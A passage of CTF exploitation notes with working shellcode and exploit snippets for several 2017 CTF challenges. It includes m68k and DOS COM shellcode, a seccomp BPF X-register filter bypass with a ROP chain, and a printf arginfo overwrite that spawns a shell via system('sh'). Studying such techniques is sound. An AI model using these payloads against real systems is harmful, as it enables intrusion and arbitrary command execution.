trap    #0
moveq   #63, %d0
moveq   #2,  %d2         ; newfd = stderr
trap    #0

; execve("/bin/sh", ["/bin/sh", NULL], NULL)
lea     binsh(%pc), %a0  ; "/bin/sh\0"
move.l  %a0, %d1
sub.l   %d2, %d2         ; d2 = NULL (argv approximation for CTF)
sub.l   %d3, %d3         ; d3 = NULL (envp)
moveq   #11, %d0         ; execve
trap    #0
binsh:  .ascii "/bin/sh\0"
```

**Key insight:** When shellcode size is severely constrained, re-use the program's own `read()` function with the already-mmap'd RWX region as the destination buffer. m68k uses `trap #0` with d0–d3 registers, not the x86 `int 0x80`/`syscall` convention.

**References:** HackIT CTF 2017

---

## DOS COM Real Mode Shellcode (SEC-T CTF 2017)

**Pattern:** DOS COM executables run in 16-bit real mode with no memory protection — the code segment is writable at runtime. An arbitrary write primitive into the code segment at an EXIT handler location allows injecting payload code. Payloads use DOS `int 0x21` syscalls: `ah=0x3d` (open file), `ah=0x3f` (read file), `ah=0x09` (print string).

```asm
; DOS COM exploitation: code segment is writable
; INT 0x21 syscall convention: ah = function number
; Useful functions:
;   ah=0x3d  open file: ds:dx = filename, al = mode → ax = fd
;   ah=0x3f  read file: bx = fd, cx = count, ds:dx = buffer → ax = bytes read
;   ah=0x09  print $-terminated string: ds:dx = string address
;   ah=0x4c  exit: al = exit code

; Example: read flag.txt and print it
mov dx, offset flag_name   ; "flag.txt",0 (ASCIIZ: ah=0x3d expects a NUL-terminated name, not '$')
mov ax, 0x3d00             ; open, read-only
int 0x21                   ; ax = file handle

mov bx, ax                 ; fd = file handle
mov dx, offset buffer
mov cx, 0x100              ; read 256 bytes
mov ah, 0x3f
int 0x21                   ; read into buffer

; Terminate buffer with '$' for int 0x21 ah=0x09 (ax = bytes read)
mov bx, ax
mov byte ptr [buffer + bx], '$'
mov dx, offset buffer
mov ah, 0x09
int 0x21                   ; print buffer
```

**Key insight:** DOS COM files have no read-only memory — the code segment is writable. DOS interrupts `int 0x21` with `ah=3d/3f/09` handle open/read/print. Any write primitive that reaches the code segment can inject executable shellcode, even at EXIT handler positions.

**References:** SEC-T CTF 2017

---

## Seccomp BPF X-Register Addressing Mode Bypass (HITCON 2017)

**Pattern:** A seccomp BPF filter uses the X-register addressing mode (opcode `0x1d`) to compare `syscall_number == rdx` (the third argument). However, `libseccomp-tools` (and older `seccomp-tools`) disassemblers do not support the X-register addressing mode, causing the filter to appear more restrictive than it actually is. Reality: if `rax` (syscall number) equals `rdx` (3rd argument) at the time of the syscall, the comparison passes and the syscall is allowed.

**How to detect:**
```bash
# Dump BPF bytecode manually and look for opcode 0x1d (JEQ X)
# seccomp-tools disassembly will show "???" or skip lines for 0x1d opcodes
# Raw bytecode: struct sock_filter { __u16 code; __u8 jt; __u8 jf; __u32 k; }
# code=0x1d: BPF_JMP | BPF_JEQ | BPF_X  → compare A == X (X-register)
python3 - <<'EOF'
import struct
data = open('seccomp_filter.bin', 'rb').read()
# Step over whole 8-byte sock_filter entries; ignore any short trailing chunk
for i in range(0, len(data) - 7, 8):
    code, jt, jf, k = struct.unpack('<HBBI', data[i:i+8])
    if code == 0x1d:
        print(f'[{i//8}] JEQ X  jt={jt} jf={jf}  (X-reg compare!)')
EOF
```

**Exploitation:**
```python
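# Filter effectively allows: syscall if rax == rdx
# rdx is also the third syscall argument, so the number must be a usable value there.
# execve (59) would need envp = 59, an invalid pointer, and fails with EFAULT.
# open (2) works: the mode argument (rdx) is ignored without O_CREAT.
# flag_path_addr is a hypothetical pointer to "/flag\0"; gadget names are placeholders.
rop = flat(
    pop_rdx_rbx, 2, 0,       # rdx = 2 (matches open's syscall number)
    pop_rax, 2,              # rax = 2 (open)
    pop_rdi, flag_path_addr,
    pop_rsi, 0,              # O_RDONLY
    syscall_ret,
)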
```

**Key insight:** Security tools that cannot decode all BPF addressing modes give false confidence — always verify filter behavior by reading raw BPF bytecode or testing empirically. The X-register mode (`JEQ X`, opcode `0x1d`) is valid BPF but rarely generated by `libseccomp`, so tools miss it.

**References:** HITCON CTF 2017

---

## Custom Printf Format Specifier Arginfo Overwrite (Hack.lu 2017)

**Pattern:** glibc's `register_printf_specifier()` stores function pointers (including an `arginfo` callback) in a heap buffer. A heap overflow overwrites the `arginfo` callback for a custom format specifier. The first field of `printf_info` passed to the `arginfo` function is `precision` — an attacker-controlled integer from `%.Ns` (where N is the precision value). Encoding a shell command as its decimal ASCII value (e.g., `26739` = `'s','h','\0'` as little-endian bytes) causes the `arginfo` callback to receive `"sh"` as its string argument, achieving command execution.

**Mechanism:**
```c
// register_printf_specifier stores:
//   handler_fn   (called to produce output)
//   arginfo_fn   (called to determine argument type/size)
// Both are stored as pointers in a heap region

// When printf("%.26739s", ...) is called with custom specifier:
//   printf_info.precision = 26739  (= 0x6873 = 'sh' in little-endian)
//   arginfo_fn is called with &printf_info as first argument
//   If arginfo_fn = system: system((char*)&printf_info) → system("sh\x00...")
//   because the precision field at offset 0 contains the bytes 's','h','\0'
```

**Exploitation:**
```python
# Overflow heap to overwrite arginfo_fn pointer with system()
# Then trigger with precision encoding the command:
# "sh" = ord('s') + ord('h') * 256 = 0x68 * 256 + 0x73 = 26739
payload = b'%.26739s'  # precision=26739, bytes: 0x73 0x68 0x00 = "sh\0"
# When custom specifier is used, arginfo(printf_info_ptr) → system("sh")
```
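
The precision value for other short commands can be derived the same way. This sketch assumes the command must fit in the 4-byte `prec` field with room for a NUL terminator, so at most 3 bytes; the helper name and the `s` conversion character are illustrative.

```python
def precision_for(cmd: bytes) -> int:
    """Encode a short command as the little-endian integer stored in printf_info.prec."""
    if not 0 < len(cmd) <= 3 or b"\x00" in cmd:
        raise ValueError("command must be 1-3 non-NUL bytes to leave room for the terminator")
    return int.from_bytes(cmd, "little")

prec = precision_for(b"sh")
fmt = f"%.{prec}s".encode()
print(prec, fmt)
```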

**Key insight:** Custom printf format handlers expose `precision` and `width` as attacker-controlled integers in `printf_info`. Encoding a shell command as the decimal precision value (e.g., `26739` = `"sh\0"`) causes the `arginfo` callback — if overwritten with `system()` — to execute the command. The `printf_info` struct's first field is the argument to `system()`.

**References:** Hack.lu CTF 2017

---

See [advanced-exploits-2.md](advanced-exploits-2.md) for bytecode validator bypass, io_uring UAF with SQE injection, integer truncation bypass, GC null-reference cascading corruption, leakless libc via multi-fgets, signed/unsigned char underflow with TLS destructor hijack, custom shadow stack bypass, and signed int overflow with XSS-to-binary pwn bridge.

See [advanced-exploits-3.md](advanced-exploits-3.md) for stack variable overlap, 1-byte overflow via 8-bit loop counter, game AI arithmetic mean OOB read, arbitrary read/write GOT overwrite, stack leak via __environ + memcpy overflow, JIT sandbox uint16 jump truncation, DNS compression pointer overflow, and ELF signing bypass via program header manipulation.
